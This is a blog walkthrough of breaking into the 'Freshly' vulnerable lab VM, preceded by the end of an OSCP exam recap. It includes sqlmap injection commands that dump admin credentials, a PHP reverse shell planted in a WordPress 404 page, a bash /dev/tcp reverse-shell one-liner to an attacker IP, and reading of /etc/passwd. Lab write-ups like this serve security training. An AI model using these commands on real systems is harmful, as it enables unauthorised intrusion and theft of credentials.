<li><div style="line-height: 100%; margin-bottom: 0in;">
Not getting
enough sleep the night before the examination</div>
</li>
<li><div style="line-height: 100%; margin-bottom: 0in;">
Not adequately
preparing for the unknown<br />
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
Ultimately, after
overcoming my issues, I was able to complete the exam in about 8
hours. I used a bit of the remaining time to put finishing touches
on my lab/exam report. The good folks at Offensive Security sent me
a Congratulations email on the same day; awarding me with the
elusive OSCP certification; by far the best certification
accomplishment thus far.</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
</li>
</ul>
<div>
<span style="line-height: 16px;"><br /></span></div>
<div>
<span style="line-height: 100%; text-indent: -0.25in;">I will continue to hone my craft in preparation for Cracking the
Perimeter/OSCE later this year</span></div>
</div>
Court Graham, CISSP, OSCP, C|EH, PCI-QSA, ITILhttp://www.blogger.com/profile/12137980462590589771noreply@blogger.com7tag:blogger.com,1999:blog-4508217951330976703.post-9694575449710129632015-05-27T14:57:00.000-04:002015-05-27T22:25:47.381-04:00Freshly Vulnerable VM Walkthrough<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: left;">
<br /></div>
Today I will be explaining how I was able to complete the <a href="http://www.top-hat-sec.com/" target="_blank">Top-Hat-Sec</a> Freshly Challenge. The goal of this challenge is to break into the machine via the web and find the secret hidden in a sensitive file. I took it just a tiny bit further and gained a root shell. Here's what I did:<br />
<br />
<h3 style="text-align: left;">
<b>Enumeration</b></h3>
<div style="text-align: left;">
<b><br /></b></div>
<div style="text-align: left;">
After spinning up the VM in VirtualBox, I located its DHCP Address on my local nat network, and had at it:</div>
<br />
root@kali:~# nmap -A 10.1.1.11<br />
<br />
Starting Nmap 6.47 ( http://nmap.org ) at 2015-05-22 21:09 EDT<br />
Nmap scan report for 10.1.1.11<br />
Host is up (0.00052s latency).<br />
Not shown: 997 closed ports<br />
PORT STATE SERVICE VERSION<br />
<b>
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))</b><br />
|_http-title: Site doesn't have a title (text/html).<br />
<b>
443/tcp open ssl/http Apache httpd</b><br />
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)<br />
|_http-title: Site doesn't have a title (text/html).<br />
| ssl-cert: Subject: commonName=www.example.com<br />
| Not valid before: 2015-02-17T03:30:05+00:00<br />
|_Not valid after: 2025-02-14T03:30:05+00:00<br />
|_ssl-date: 1901-12-13T20:45:52+00:00; -113y160d4h24m13s from local time.<br />
<b>
8080/tcp open http Apache httpd</b><br />
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)<br />
|_http-title: Site doesn't have a title (text/html).<br />
MAC Address: 08:00:27:F2:73:82 (Cadmus Computer Systems)<br />
<br />
Network Distance: 1 hop<br />
<br />
TRACEROUTE<br />
HOP RTT ADDRESS<br />
1 0.52 ms 10.1.1.11<br />
<br />
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .<br />
Nmap done: 1 IP address (1 host up) scanned in 26.27 seconds<br />
root@kali:~#<br />
<br />
______________________________________________________________________________<br />
<br />
<br />
A quick viewing of some of the hosted webpages brought this challenge close to my geek heart:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwp0vpoXwikWBsCS1C0XGrsx8EiZk0RR0YOOlVOemizk8qRzv4YrQVXjA9ogLOLo3f6xZvnaJTjj-JHTItFOqXLcK3WHkAkH08PJwBu2lvtbSrVdB_Szboq9bfb6A9HVHvZNzpGP93oVO0/s1600/Screenshot+from+2015-05-22+21%253A15%253A25.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwp0vpoXwikWBsCS1C0XGrsx8EiZk0RR0YOOlVOemizk8qRzv4YrQVXjA9ogLOLo3f6xZvnaJTjj-JHTItFOqXLcK3WHkAkH08PJwBu2lvtbSrVdB_Szboq9bfb6A9HVHvZNzpGP93oVO0/s400/Screenshot+from+2015-05-22+21%253A15%253A25.png" width="400" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
Paying heed to the Jedi Mind Trick, I pushed forward </div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: left;">
Continuing with my normal enumeration process, I used nikto to possibly identify any low hanging fruit or directories. </div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
This was overlooked -- Nikto scan on port 80 found login.php<br />
<br />
<br />
root@kali:~# nikto -h 10.1.1.11<br />
- Nikto v2.1.6<br />
---------------------------------------------------------------------------<br />
+ Target IP: 10.1.1.11<br />
+ Target Hostname: 10.1.1.11<br />
+ Target Port: 80<br />
+ Start Time: 2015-05-22 23:47:57 (GMT-4)<br />
---------------------------------------------------------------------------<br />
+ Server: Apache/2.4.7 (Ubuntu)<br />
+ Server leaks inodes via ETags, header found with file /, fields: 0x2f 0x50f4228b8016c <br />
+ The anti-clickjacking X-Frame-Options header is not present.<br />
+ No CGI Directories found (use '-C all' to force check all possible dirs)<br />
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST <br />
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.5<br />
+ Uncommon header 'x-webkit-csp' found, with contents: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';style-src 'self' 'unsafe-inline';img-src 'self' data: *.tile.openstreetmap.org *.tile.opencyclemap.org;<br />
+ Uncommon header 'x-ob_mode' found, with contents: 0<br />
+ Uncommon header 'x-content-security-policy' found, with contents: default-src 'self' ;options inline-script eval-script;img-src 'self' data: *.tile.openstreetmap.org *.tile.opencyclemap.org;<br />
+ OSVDB-3233: /icons/README: Apache default file found.<br />
+ <b>/login.php: Admin login page/section found.</b><br />
+ /phpmyadmin/: phpMyAdmin directory found<br />
+ 6732 requests: 0 error(s) and 10 item(s) reported on remote host<br />
+ End Time: 2015-05-22 23:48:12 (GMT-4) (15 seconds)<br />
---------------------------------------------------------------------------<br />
+ 1 host(s) tested<br />
root@kali:~# </div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
______________________________________________________________________________</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Needing more information, I turned to Dirbuster to reveal the site's structure or any hidden pages. I quickly found a wordpress site hosted both on port 443 & 8080. </div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuhyE1f0gLRjQaqcHaH-xKliKulMbKtG2Mq4LscmzF7GUVEwTv0cDYPMv-RkXL4rVA5T1IwHrKNdGd0OEtcb6cl_4r4mzmVGqG7mhuiz5COB_YR1zQ6oN_ev6RVW4Mi_hjNpUxzllnXJgU/s1600/Screenshot+from+2015-05-22+21%253A17%253A28.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="243" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuhyE1f0gLRjQaqcHaH-xKliKulMbKtG2Mq4LscmzF7GUVEwTv0cDYPMv-RkXL4rVA5T1IwHrKNdGd0OEtcb6cl_4r4mzmVGqG7mhuiz5COB_YR1zQ6oN_ev6RVW4Mi_hjNpUxzllnXJgU/s400/Screenshot+from+2015-05-22+21%253A17%253A28.png" width="400" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Ok, at this point I was starting to get happy, due to the rich amount of Wordpress vulnerabilities out there. I turned to wpscan trying to enumerate the admin user and find any vulns:</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
root@kali:~# wpscan --url 10.1.1.11:8080/wordpress/ --enumerate u<br />
_______________________________________________________________<br />
__ _______ _____ <br />
\ \ / / __ \ / ____| <br />
\ \ /\ / /| |__) | (___ ___ __ _ _ __ <br />
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ <br />
\ /\ / | | ____) | (__| (_| | | | |<br />
\/ \/ |_| |_____/ \___|\__,_|_| |_|<br />
<br />
WordPress Security Scanner by the WPScan Team <br />
Version 2.6<br />
Sponsored by Sucuri - https://sucuri.net<br />
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_<br />
_______________________________________________________________<br />
<br />
[+] URL: http://10.1.1.11:8080/wordpress/<br />
[+] Started: Fri May 22 21:41:21 2015<br />
<br />
[!] The WordPress 'http://10.1.1.11:8080/wordpress/readme.html' file exists exposing a version number<br />
[!] Full Path Disclosure (FPD) in: 'http://10.1.1.11:8080/wordpress/wp-includes/rss-functions.php'<br />
[+] Interesting header: SERVER: Apache<br />
[+] Interesting header: X-FRAME-OPTIONS: SAMEORIGIN<br />
[+] XML-RPC Interface available under: http://10.1.1.11:8080/wordpress/xmlrpc.php<br />
<br />
[+] WordPress version 4.1 identified from meta generator<br />
<br />
[+] Enumerating plugins from passive detection ...<br />
| 4 plugins found:<br />
<br />
[+] Name: cart66-lite - v1.5.3<br />
| Location: http://10.1.1.11:8080/wordpress/wp-content/plugins/cart66-lite/<br />
| Readme: http://10.1.1.11:8080/wordpress/wp-content/plugins/cart66-lite/readme.txt<br />
<br />
[!] <b>Title: Cart66 Lite <= 1.5.3 - SQL Injection</b><br />
Reference: https://wpvulndb.com/vulnerabilities/7737<br />
Reference: https://research.g0blin.co.uk/g0blin-00022/<br />
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9442<br />
[i] Fixed in: 1.5.4<br />
<br />
[+] Name: contact-form-7 - v4.1<br />
| Location: http://10.1.1.11:8080/wordpress/wp-content/plugins/contact-form-7/<br />
| Readme: http://10.1.1.11:8080/wordpress/wp-content/plugins/contact-form-7/readme.txt<br />
<br />
[+] Name: proplayer - v4.7.9.1<br />
| Location: http://10.1.1.11:8080/wordpress/wp-content/plugins/proplayer/<br />
| Readme: http://10.1.1.11:8080/wordpress/wp-content/plugins/proplayer/readme.txt<br />
<br />
[!] <b>Title: ProPlayer 4.7.9.1 - SQL Injection</b><br />
Reference: https://wpvulndb.com/vulnerabilities/6912<br />
Reference: http://osvdb.org/93564<br />
Reference: http://www.exploit-db.com/exploits/25605/<br />
<br />
[+] Name: all-in-one-seo-pack - v2.2.5.1<br />
| Location: http://10.1.1.11:8080/wordpress/wp-content/plugins/all-in-one-seo-pack/<br />
| Readme: http://10.1.1.11:8080/wordpress/wp-content/plugins/all-in-one-seo-pack/readme.txt<br />
<br />
[+] Enumerating usernames ...<br />
[+] Identified the following 1 user/s:<br />
+----+-------+-------+<br />
| Id | Login | Name |<br />
+----+-------+-------+<br />
| 1 | admin | admin |<br />
+----+-------+-------+<br />
[!] Default first WordPress username 'admin' is still used<br />
<br />
[+] Finished: Fri May 22 21:41:28 2015<br />
[+] Memory used: 3.234 MB<br />
[+] Elapsed time: 00:00:06<br />
root@kali:~# </div>
<div style="text-align: left;">
_____________________________________________________________________________</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Ok, there are a couple of SQL injection one for the Cart66 Lite Plugin. This one requires credentials which I don't have yet..</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
The ProPlayer Injection plain didn't work for me...</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
I also tried to brute force the admin user's password, unsuccessfully. I must have overlooked something. Going back through my notes I found the login.php page in my nikto output:</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Browsing to it I found a simple login page which had SQL injection written all over it:</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX7VPKhEUhl-qVQe2ZKVDPDIyLFDX74V-v7VxnzYfZqothqaM9uHjxjgPd1ORF7HInxMDGUZI4O0Dv-4fpHADjYBYCX-K8bAvAQa-VLdOiI-32I61aYsFB6iWwb0oK6fO-cDP-LqDZoEna/s1600/Screenshot+from+2015-05-27+13%253A49%253A43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX7VPKhEUhl-qVQe2ZKVDPDIyLFDX74V-v7VxnzYfZqothqaM9uHjxjgPd1ORF7HInxMDGUZI4O0Dv-4fpHADjYBYCX-K8bAvAQa-VLdOiI-32I61aYsFB6iWwb0oK6fO-cDP-LqDZoEna/s400/Screenshot+from+2015-05-27+13%253A49%253A43.png" width="400" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
I started a handful of the command injection strings, the author of the VM helped us out a bit by coding a 1 or 0 visible on the page.</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0IWJrdQetnH9G68khBVVfyLjlZwk72BVWS0NIhdA1cEQ8yepBkki4mFhFJp4ltJ6Pgo6LBPfvPm4RZkCcVQmLIFcBwWHnplBRrlApPJIjSqypEukTTwK4gjdQiVn6uyT_Hr2gAtc_JVQu/s1600/Screenshot+from+2015-05-27+13%253A48%253A45.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0IWJrdQetnH9G68khBVVfyLjlZwk72BVWS0NIhdA1cEQ8yepBkki4mFhFJp4ltJ6Pgo6LBPfvPm4RZkCcVQmLIFcBwWHnplBRrlApPJIjSqypEukTTwK4gjdQiVn6uyT_Hr2gAtc_JVQu/s400/Screenshot+from+2015-05-27+13%253A48%253A45.png" width="400" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
A series of single quotes revealed that there was an underlying Mysql database on the server. Sounds like a job for sqlmap:</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
root@kali:~# sqlmap -u "10.1.1.11/login.php" --data="user=1&password=1&s=Submit" --dbs <br />
_<br />
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150527}<br />
|_ -| . | | | .'| . |<br />
|___|_ |_|_|_|_|__,| _|<br />
|_| |_| http://sqlmap.org<br />
<br />
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program<br />
<br />
[*] starting at 23:53:02<br />
<br />
[23:53:02] [INFO] resuming back-end DBMS 'mysql' <br />
[23:53:02] [INFO] testing connection to the target URL<br />
[23:53:02] [INFO] heuristics detected web page charset 'ascii'<br />
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />
---<br />
Parameter: user (POST)<br />
Type: AND/OR time-based blind<br />
Title: MySQL > 5.0.11 AND time-based blind (SELECT)<br />
Payload: user=1' AND (SELECT * FROM (SELECT(SLEEP(5)))pxgC) AND 'YfWH'='YfWH&password=1&s=Submit<br />
---<br />
[23:53:03] [INFO] the back-end DBMS is MySQL<br />
web server operating system: Linux Ubuntu<br />
web application technology: Apache 2.4.7, PHP 5.5.9<br />
back-end DBMS: MySQL 5.0.11<br />
[23:53:03] [INFO] fetching database names<br />
[23:53:03] [INFO] fetching number of databases<br />
[23:53:03] [WARNING] time-based comparison requires larger statistical model, please wait.............................. <br />
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] <br />
[23:53:14] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors <br />
7<br />
[23:53:19] [INFO] retrieved: <br />
[23:53:24] [INFO] adjusting time delay to 1 second due to good response times<br />
information_schema<br />
[23:54:35] [INFO] retrieved: login<br />
[23:54:58] [INFO] retrieved: mysql<br />
[23:55:18] [INFO] retrieved: performance_schema<br />
[23:56:29] [INFO] retrieved: phpmyadmin<br />
[23:57:13] [INFO] retrieved: users<br />
[23:57:32] [INFO] retrieved: wordpress8080<br />
<b>
available databases [7]:<br />
[*] information_schema<br />
[*] login<br />
[*] mysql<br />
[*] performance_schema<br />
[*] phpmyadmin<br />
[*] users<br />
[*] wordpress8080</b><br />
<br />
[23:58:32] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.11'<br />
<br />
[*] shutting down at 23:58:32<br />
<br />
root@kali:~#</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
_______________________________________________________________________________</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Poking around in each DB with sqlmap I ultimately found the wordpress admin account:</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
root@kali:~# sqlmap -u "10.1.1.11/login.php" --data="user=1&password=1&s=Submit" -D wordpress8080 --dump<br />
_<br />
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150527}<br />
|_ -| . | | | .'| . |<br />
|___|_ |_|_|_|_|__,| _|<br />
|_| |_| http://sqlmap.org<br />
<br />
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program<br />
<br />
[*] starting at 23:46:07<br />
<br />
[23:46:07] [WARNING] using '/root/.sqlmap/output' as the output directory<br />
[23:46:07] [INFO] testing connection to the target URL<br />
[23:46:07] [INFO] heuristics detected web page charset 'ascii'<br />
[23:46:07] [INFO] testing if the target URL is stable. This can take a couple of seconds<br />
[23:46:08] [INFO] target URL is stable<br />
[23:46:08] [INFO] testing if POST parameter 'user' is dynamic<br />
[23:46:08] [WARNING] POST parameter 'user' does not appear dynamic<br />
[23:46:08] [WARNING] heuristic (basic) test shows that POST parameter 'user' might not be injectable<br />
[23:46:08] [INFO] testing for SQL injection on POST parameter 'user'<br />
[23:46:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'<br />
[23:46:09] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'<br />
[23:46:09] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'<br />
[23:46:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'<br />
[23:46:09] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'<br />
[23:46:09] [INFO] testing 'MySQL inline queries'<br />
[23:46:09] [INFO] testing 'PostgreSQL inline queries'<br />
[23:46:09] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'<br />
[23:46:09] [INFO] testing 'Oracle inline queries'<br />
[23:46:09] [INFO] testing 'SQLite inline queries'<br />
[23:46:09] [INFO] testing 'MySQL > 5.0.11 stacked queries'<br />
[23:46:09] [INFO] testing 'PostgreSQL > 8.1 stacked queries'<br />
[23:46:09] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'<br />
[23:46:09] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (SELECT)'<br />
[23:46:19] [INFO] POST parameter 'user' seems to be 'MySQL > 5.0.11 AND time-based blind (SELECT)' injectable <br />
[23:46:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'<br />
[23:46:19] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found<br />
[23:46:20] [INFO] target URL appears to be UNION injectable with 2 columns<br />
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] <br />
[23:46:23] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') <br />
[23:46:23] [INFO] testing 'Generic UNION query (88) - 1 to 20 columns'<br />
[23:46:23] [INFO] checking if the injection point on POST parameter 'user' is a false positive<br />
POST parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N] <br />
sqlmap identified the following injection points with a total of 133 HTTP(s) requests:<br />
---<br />
Parameter: user (POST)<br />
Type: AND/OR time-based blind<br />
Title: MySQL > 5.0.11 AND time-based blind (SELECT)<br />
Payload: user=1' AND (SELECT * FROM (SELECT(SLEEP(5)))pxgC) AND 'YfWH'='YfWH&password=1&s=Submit<br />
---<br />
[23:46:45] [INFO] the back-end DBMS is MySQL<br />
web server operating system: Linux Ubuntu<br />
web application technology: Apache 2.4.7, PHP 5.5.9<br />
back-end DBMS: MySQL 5.0.11<br />
[23:46:45] [INFO] fetching tables for database: 'wordpress8080'<br />
[23:46:45] [INFO] fetching number of tables for database 'wordpress8080'<br />
[23:46:45] [INFO] retrieved: <br />
[23:46:45] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors <br />
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] <br />
1<br />
[23:46:54] [INFO] retrieved: <br />
[23:47:04] [INFO] adjusting time delay to 1 second due to good response times<br />
users<br />
[23:47:21] [INFO] fetching columns for table 'users' in database 'wordpress8080'<br />
[23:47:21] [INFO] retrieved: 2<br />
[23:47:23] [INFO] retrieved: username<br />
[23:47:53] [INFO] retrieved: password<br />
[23:48:28] [INFO] fetching entries for table 'users' in database 'wordpress8080'<br />
[23:48:28] [INFO] fetching number of entries for table 'users' in database 'wordpress8080'<br />
[23:48:28] [INFO] retrieved: 1<br />
[23:48:29] [INFO] retrieved: SuperSecretPassword<br />
[23:49:44] [INFO] retrieved: admin<br />
[23:50:03] [INFO] analyzing table dump for possible password hashes<br />
<b>
Database: wordpress8080<br />
Table: users<br />
[1 entry]<br />
+----------+---------------------+<br />
| username | password |<br />
+----------+---------------------+<br />
| admin | SuperSecretPassword |<br />
+----------+---------------------+</b><br />
<br />
[23:50:03] [INFO] table 'wordpress8080.users' dumped to CSV file '/root/.sqlmap/output/10.1.1.11/dump/wordpress8080/users.csv'<br />
[23:50:03] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.11'<br />
<br />
[*] shutting down at 23:50:03<br />
<br />
root@kali:~#</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
________________________________________________________________________________</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Lets use the new found credentials:</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYS_Jc_3Aux8zmR7a83p0ySJj-BSULy0Giv7NfBreLRyp8huiWbDR-IQZ0tVrpxfg8OFIiPA8v0gJrspNc70muhiEbyEE7DSGLNDm8Scy_N1J0m962lLFcK9JxANNc707lky1vGc4T_LQa/s1600/Screenshot+from+2015-05-27+00%253A04%253A17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="315" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYS_Jc_3Aux8zmR7a83p0ySJj-BSULy0Giv7NfBreLRyp8huiWbDR-IQZ0tVrpxfg8OFIiPA8v0gJrspNc70muhiEbyEE7DSGLNDm8Scy_N1J0m962lLFcK9JxANNc707lky1vGc4T_LQa/s320/Screenshot+from+2015-05-27+00%253A04%253A17.png" width="320" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Bingo:</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis7nLzoiBu7Ec0r4EONzPKai5Cqz0vzbQiOIO7s6snUfT9QDPfr1ooqK3ZisePhVoOOwioHBhOBUfxFeMOcnUARRQl9b5sdR2h6mGHlVbKiyXKjF1d7RaGMkmSb_ZyiCUwy3E3gspAmzHI/s1600/Screenshot+from+2015-05-27+00%253A05%253A36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis7nLzoiBu7Ec0r4EONzPKai5Cqz0vzbQiOIO7s6snUfT9QDPfr1ooqK3ZisePhVoOOwioHBhOBUfxFeMOcnUARRQl9b5sdR2h6mGHlVbKiyXKjF1d7RaGMkmSb_ZyiCUwy3E3gspAmzHI/s400/Screenshot+from+2015-05-27+00%253A05%253A36.png" width="400" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Now, I have used multiple ways to get a shell while hacking wordpress, often times uploading a plugin which allows to modification of file types when .php extensions are blocked. Yes that was the case here as well. (Also, the Cart66 SQL Injection exploit may work now as well). However a good friend brought the obvious thing to my attention; "Why go through the trouble of uploading a plugin potentially leaving tracks when you can just update an existing page within wordpress with your own php code?". I had no logical answer. So I did it, and it was much easier. </div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Those of you who are familiar with Kali, there are webshells for most of your needs in the following directory:</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<b>/usr/share/webshells/php</b></div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHRxkk0GiBejsYEZpkyxW9jdpRJqbpiVAUe3fBmFfYh2Ge_4d9FVUMdi5DpbHBn1n2NvP_JmmDvP7J6SLr4gzEPBZyUZmzx7FT7wMIfIDBMITBqgqzd-awJOObdJZNNOvXuPzfEkuiausK/s1600/webshells.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="271" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHRxkk0GiBejsYEZpkyxW9jdpRJqbpiVAUe3fBmFfYh2Ge_4d9FVUMdi5DpbHBn1n2NvP_JmmDvP7J6SLr4gzEPBZyUZmzx7FT7wMIfIDBMITBqgqzd-awJOObdJZNNOvXuPzfEkuiausK/s400/webshells.png" width="400" /></a></div>
<div style="text-align: left;">
<br /></div>
<h3 style="text-align: left;">
Penetration</h3>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
The php-reverse-shell.php is identical to the one hosted by <a href="http://pentestmonkey.net/tools/web-shells/php-reverse-shell" target="_blank">pentestmonkey</a>. I was able to simply cut and paste the contents of the file into the 404.page in wordpress. </div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
There is one aspect of the shell which needs to be modified to match your attacking machine address:</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<b>$ip = '10.1.1.5'; // CHANGE THIS<br />
$port = 1234; // CHANGE THIS</b></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
After starting a netcat listner on port 1234 and browsing to the now malicious 404.php page, the reverseshell is executed:</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxH692-wcGnKfs4H_pZRow6BKZra3msjClJ84y4AZGp1JFX1EupJiVbJ6ELEUD_JAB5AZutkOl9XzMOfPc2myJOqU0iLYxe7FagWl1OBsehPS5Ruq2qv9hFTvqtYGoYiY-KLjW2UIqPyis/s1600/Screenshot+from+2015-05-27+00%253A15%253A45.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxH692-wcGnKfs4H_pZRow6BKZra3msjClJ84y4AZGp1JFX1EupJiVbJ6ELEUD_JAB5AZutkOl9XzMOfPc2myJOqU0iLYxe7FagWl1OBsehPS5Ruq2qv9hFTvqtYGoYiY-KLjW2UIqPyis/s400/Screenshot+from+2015-05-27+00%253A15%253A45.png" width="400" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Now that we have a limited shell, we'll need to escape from it. Whenever possible, I use the follwing python shell escape sequence:</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<b>python -c 'import pty; pty.spawn("/bin/bash")'</b></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Here are a couple of other valuable shell escape sequences, python won't always be at your disposal:</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
bash -i >& /dev/tcp/192.168.22.10/443 0>&1</div>
<div style="text-align: left;">
/bin/sh -i</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
and... creating and copying a public keyfile to the .authorized_keys directory on the victim; more to come on this in a separate write-up.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Once I had a decent shell, things moved pretty quickly due to permissions on the etc/shadow file:</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
$ python -c 'import pty; pty.spawn("/bin/bash")'</div>
<div style="text-align: left;">
daemon@Freshly:/$ <br />
<br />
daemon@Freshly:/$ id<br />
id<br />
uid=1(daemon) gid=1(daemon) groups=1(daemon)<br />
daemon@Freshly:/$ <br />
<br />
daemon@Freshly:/$ uname -a<br />
uname -a<br />
Linux Freshly 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686 i686 i686 GNU/Linux<br />
daemon@Freshly:/$ cat /etc/passwd<br />
cat /etc/passwd<br />
root:x:0:0:root:/root:/bin/bash<br />
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin<br />
bin:x:2:2:bin:/bin:/usr/sbin/nologin<br />
sys:x:3:3:sys:/dev:/usr/sbin/nologin<br />
sync:x:4:65534:sync:/bin:/bin/sync<br />
games:x:5:60:games:/usr/games:/usr/sbin/nologin<br />
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin<br />
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin<br />
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin<br />
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin<br />
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin<br />
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin<br />
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin<br />
